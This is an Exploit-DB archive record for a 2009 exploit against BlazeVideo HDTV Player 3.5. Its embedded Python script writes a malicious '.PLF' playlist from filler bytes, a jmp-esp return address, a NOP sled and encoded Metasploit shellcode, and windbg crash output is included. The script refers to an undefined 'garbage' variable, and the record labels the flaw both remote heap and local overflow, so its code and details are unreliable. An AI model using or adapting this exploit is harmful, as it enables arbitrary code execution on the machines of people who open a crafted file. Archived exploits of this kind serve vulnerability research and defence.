{"id": "EDB-ID:7975", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow", "description": "", "published": "2009-02-04T00:00:00", "modified": "2009-02-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/7975", "reporter": "LiquidWorm", "references": [], "cvelist": ["2009-0450"], "immutableFields": [], "lastseen": "2022-08-16T05:07:12", "viewCount": 16, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-0450"]}, {"type": "openvas", "idList": ["OPENVAS:15940"]}]}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "713c59b4375c70aa06e6f91b22aaf01d"}, "sourceHref": "https://www.exploit-db.com/download/7975", "sourceData": "#!/usr/bin/python\r\n#\r\n# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit\r\n#\r\n# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV\r\n# Player software, combining HDTV playback, FM receiving, video record and DVD playback\r\n# functions. 
You can take advantage of the PC monitor's high resolution to watch, record, and play back\r\n# high-definition HDTV programs or teletext broadcast programs.\r\n#\r\n# Product web page: http://www.blazevideo.com/hdtv-player/index.htm\r\n#\r\n# Tested on Microsoft Windows XP Professional SP2 (English)\r\n#\r\n# ------------------------------------windbg------------------------------------\r\n#\r\n# (620.d74): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001\r\n# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216\r\n# 43434343 ?? ???\r\n#\r\n#--------------------------------------------------------------------------------\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n#\r\n# liquidworm [t00t] gmail [w00t] com\r\n#\r\n# http://www.zeroscience.org/\r\n#\r\n# 03.01.2009\r\n#\r\n\r\n\r\nprint \"--------------------------------------------------------------------------\"\r\nprint \" BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\\n\"\r\nprint \"\\t\\t\\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\\n\"\r\nprint \"--------------------------------------------------------------------------\"\r\n\r\nbuffer = \"\\x41\" * 260\r\n\r\neip = \"\\xc0\\x25\\x49\\x7e\" #jmp esp user32.dll\r\n\r\nnop = \"\\x90\" * 15\r\n\r\n# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com\r\nshellcode = 
(\r\n\t\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\t\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x48\\x6a\\x65\"\r\n\t\"\\x58\\x30\\x42\\x31\\x50\\x42\\x41\\x6b\\x41\\x41\\x75\\x32\\x41\\x42\\x32\\x42\"\r\n\t\"\\x41\\x30\\x42\\x41\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x39\\x79\\x6b\\x4c\\x4a\"\r\n\t\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x57\\x70\\x4c\\x4b\\x71\\x55\\x77\\x4c\\x4c\"\r\n\t\"\\x4b\\x71\\x6c\\x37\\x75\\x30\\x78\\x75\\x51\\x78\\x6f\\x4c\\x4b\\x52\\x6f\\x32\"\r\n\t\"\\x38\\x4c\\x4b\\x63\\x6f\\x45\\x70\\x55\\x51\\x5a\\x4b\\x31\\x59\\x6c\\x4b\\x44\"\r\n\t\"\\x74\\x6c\\x4b\\x55\\x51\\x4a\\x4e\\x76\\x51\\x49\\x50\\x6d\\x49\\x4c\\x6c\\x4e\"\r\n\t\"\\x64\\x6f\\x30\\x30\\x74\\x43\\x37\\x7a\\x61\\x59\\x5a\\x36\\x6d\\x46\\x61\\x6a\"\r\n\t\"\\x62\\x58\\x6b\\x7a\\x54\\x45\\x6b\\x76\\x34\\x47\\x54\\x64\\x44\\x53\\x45\\x79\"\r\n\t\"\\x75\\x4c\\x4b\\x63\\x6f\\x51\\x34\\x67\\x71\\x4a\\x4b\\x50\\x66\\x4c\\x4b\\x76\"\r\n\t\"\\x6c\\x30\\x4b\\x4c\\x4b\\x43\\x6f\\x67\\x6c\\x34\\x41\\x58\\x6b\\x6e\\x6b\\x75\"\r\n\t\"\\x4c\\x6c\\x4b\\x37\\x71\\x38\\x6b\\x6c\\x49\\x63\\x6c\\x54\\x64\\x44\\x44\\x79\"\r\n\t\"\\x53\\x50\\x31\\x69\\x50\\x63\\x54\\x4c\\x4b\\x63\\x70\\x34\\x70\\x4b\\x35\\x4f\"\r\n\t\"\\x30\\x53\\x48\\x56\\x6c\\x6e\\x6b\\x71\\x50\\x76\\x6c\\x4c\\x4b\\x34\\x30\\x45\"\r\n\t\"\\x4c\\x4c\\x6d\\x4e\\x6b\\x50\\x68\\x55\\x58\\x5a\\x4b\\x54\\x49\\x4c\\x4b\\x6f\"\r\n\t\"\\x70\\x4e\\x50\\x55\\x50\\x63\\x30\\x75\\x50\\x4c\\x4b\\x72\\x48\\x55\\x6c\\x71\"\r\n\t\"\\x4f\\x45\\x61\\x39\\x66\\x41\\x70\\x72\\x76\\x4f\\x79\\x6b\\x48\\x4d\\x53\\x4f\"\r\n\t\"\\x30\\x73\\x4b\\x50\\x50\\x50\\x68\\x6a\\x4f\\x48\\x4e\\x6d\\x30\\x43\\x50\\x62\"\r\n\t\"\\x48\\x6f\\x68\\x4b\\x4e\\x4f\\x7a\\x74\\x4e\\x46\\x37\\x39\\x6f\\x69\\x77\\x41\"\r\n\t\"\\x63\\x50\\x6f\\x70\\x6c\\x75\\x50\\x65\"\r\n\t)\r\n\r\npayload = garbage + eip + nop + shellcode + nop\r\n\r\ntry:\r\n\tout_file = 
open(\"Groundhog_Day.plf\",'w')\r\n\tout_file.write(payload)\r\n\tout_file.close()\r\n\traw_input(\"\\n\\n[*] Evil playlist successfully created.\\n\\nPress any key to continue...\")\r\nexcept:\r\n\tprint \"Oops!\"\r\n\r\n# milw0rm.com [2009-02-04]", "osvdbidlist": ["51825"], "exploitType": "local", "verified": true}
{}